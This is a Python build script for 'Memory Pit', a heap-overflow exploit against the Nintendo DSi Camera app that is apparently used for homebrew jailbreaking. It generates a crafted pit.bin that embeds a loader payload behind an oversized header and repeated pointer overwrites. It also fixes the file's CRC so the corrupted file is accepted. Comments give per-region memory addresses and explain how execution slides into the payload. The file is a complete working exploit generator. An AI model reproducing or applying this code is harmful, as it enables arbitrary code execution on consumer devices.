import os,sys,struct

#this is where pit.bin lands in wram for the reference camera version (US rev3 v1024 here)
#the address distance between v1 and v2 is such that one pit.bin cannot cover it all
US=[0,         0,0x0231ECE0,0x0231F000] 	#v0 to v3 base pit.bin addresses for each region
EU=[0,         0,0x0231ECE0,0x0231F000]  	#0 denotes unknown version base data, should never be used.
JP=[0,0x022CD940,0x0231ECE0,0x0231F000]

base=US[3]
section1_size=0x5D00

#sections need to add up to TOTAL_SIZE
#section1_size extends past the normal 0x18 header size to trigger hax in the heap. will be rounded down to nearest 0x100. 0x5E00 seems to be the closest possible to the absolute max without crashing.

'''
About this implementation of memory pit: (differs a bit from shutterbug2000's reference pit)
1. In section2 (where picture entries usually are) we have our initial pointer overwrite values repeating until the end of file. This address points to section1_midpoint.
2. This pointer, as the name implies, jumps to the middle of section1 (extended header) where our "data structure" is. This is a 0x50 area with a Link Register at the end. The area is filled with same addresses but only reads pointer+0x4C.
3. The custom Link Register in our data structure simply points to the same address (section1_midpoint) as before! This now causes the addresses to be cast as arm instuctions, which fortunately are eoreq that only modify r0 or r1.
This is good enough for a makeshift NOP, and the PC slides to our payload at the end of section1, and execution begins.

Note that the width of the section1 address area allows for some flexibility (about +/- 8KB) in pit.bin entry addresses, allowing for one pit.bin to work with multiple DSi Camera versions.
This can also allow for searching for valid base addresses for unknown versions that do not have any dumps in the wild (like Korea at one point).
'''


#################### Below this line probably should be left alone ##################################
base_adjust=section1_size-0x50 #camera puts a weird gap between sect1 and sect2 so we need to account
TOTAL_SIZE=0xBBA0              #pit.bin max total size
HEADER_SIZE=0x18               #the standard header size 
section2_size=TOTAL_SIZE - section1_size
section1_midpoint=0
section1_size &= 0xFFFFFF00
	
def crc16(data):
	''' CRC-16-STANDARD (arc)	Algorithm '''
	data = bytearray(data)
	poly=0xa001
	crc = 0x0000
	for b in data:
		cur_byte = 0xFF & b
		for _ in range(0, 8):
			if (crc & 0x0001) ^ (cur_byte & 0x0001):
				crc = (crc >> 1) ^ poly
			else:
				crc >>= 1
			cur_byte >>= 1

	return crc & 0xFFFF
	
def fix_pit_crc16():
	with open("pit.bin","rb+") as f:
		print("Patching pit.bin crc16...")
		data=f.read()
		crc=crc16(data)
		f.seek(0x14)
		f.write(struct.pack("<H",crc))
		
def fix_hdr_size(size):
	size &= 0xFFFF
	with open("pit.bin","rb+") as f:
		print("Patching pit.bin hdr size...")
		f.seek(0x16)
		f.write(struct.pack("<H",size))

def addfile(destname, srcname, offset):
	print("writing %s to %s at %08X" % (srcname,destname,offset))
	with open(srcname,"rb") as f:
		target=f.read()
	with open(destname,"rb+") as f:
		f.seek(offset)
		f.write(target)

def fillint(destname, int, offset, n):
	print("writing %08X bytes of address %08X to %s at offset %08X" % (n*4, int, destname, offset))
	intbuf=struct.pack("<I",int)*n
	with open(destname,"rb+") as f:
		f.seek(offset)
		f.write(intbuf)
		
def getSize(filename):
    st = os.stat(filename)
    return st.st_size

print("Memory Pit - exploit by Shutterbug2000 (OSS by zoogie)\n")

loader_size=getSize("loader.bin")
loader_offset=section1_size - loader_size

if loader_offset & 3:
	print("loader.bin needs to be word aligned! (4 byte)")
	exit(0)

if section1_size + section2_size != TOTAL_SIZE:
	print("sections do not add up to 0xBBA0!")
	exit(0)
	
if base == 0:
	print("zero is not a valid base address")
	exit(0)

section1_midpoint=(section1_size - loader_size + HEADER_SIZE)//2 + base
section1_midpoint &= 0xFFFFFFFC #align to word size (4)
section1fill_size=loader_offset - HEADER_SIZE
	
addfile("pit.bin","loader.bin", loader_offset) 													#sect1
fillint("pit.bin", section1_midpoint, HEADER_SIZE, section1fill_size//4) 						#sect1
fillint("pit.bin", section1_midpoint, section1_size, section2_size//4) 			 				#sect2

fix_hdr_size(section1_size)
fix_pit_crc16()

print("")
print("base address      %08X" % base)
print("base adjust       %08X" % base_adjust)
print("section1_midpoint %08X" % section1_midpoint)
print("section1_size     %08X" % section1_size)
print("section1fill_size %08X" % section1fill_size)
print("dest register     r%d (r13 - r15 not recommended)\n"   % ((section1_midpoint & 0xF000)>>12))

print("done")